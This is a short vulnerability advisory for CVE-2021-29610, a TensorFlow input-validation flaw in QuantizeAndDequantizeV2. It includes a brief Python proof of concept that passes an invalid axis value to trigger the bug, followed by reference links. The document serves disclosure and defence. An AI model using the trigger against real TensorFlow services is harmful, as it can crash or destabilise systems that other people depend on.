CVE-2021-29610: Invalid validation in `QuantizeAndDequantizeV2`
(updated )
The validation in tf.raw_ops.QuantizeAndDequantizeV2 allows invalid values for axis argument:
import tensorflow as tf
input_tensor = tf.constant([0.0], shape=[1], dtype=float)
input_min = tf.constant(-10.0)
input_max = tf.constant(-10.0)
tf.raw_ops.QuantizeAndDequantizeV2(
input=input_tensor, input_min=input_min, input_max=input_max,
signed_input=False, num_bits=1, range_given=False, round_mode='HALF_TO_EVEN',
narrow_range=False, axis=-2)
References
- github.com/advisories/GHSA-mq5c-prh3-3f3h
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-538.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-736.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-247.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/c5b0d5f8ac19888e46ca14b0e27562e7fbbee9a9
- github.com/tensorflow/tensorflow/security/advisories/GHSA-mq5c-prh3-3f3h
- nvd.nist.gov/vuln/detail/CVE-2021-29610
Code Behaviors & Features
Detect and mitigate CVE-2021-29610 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →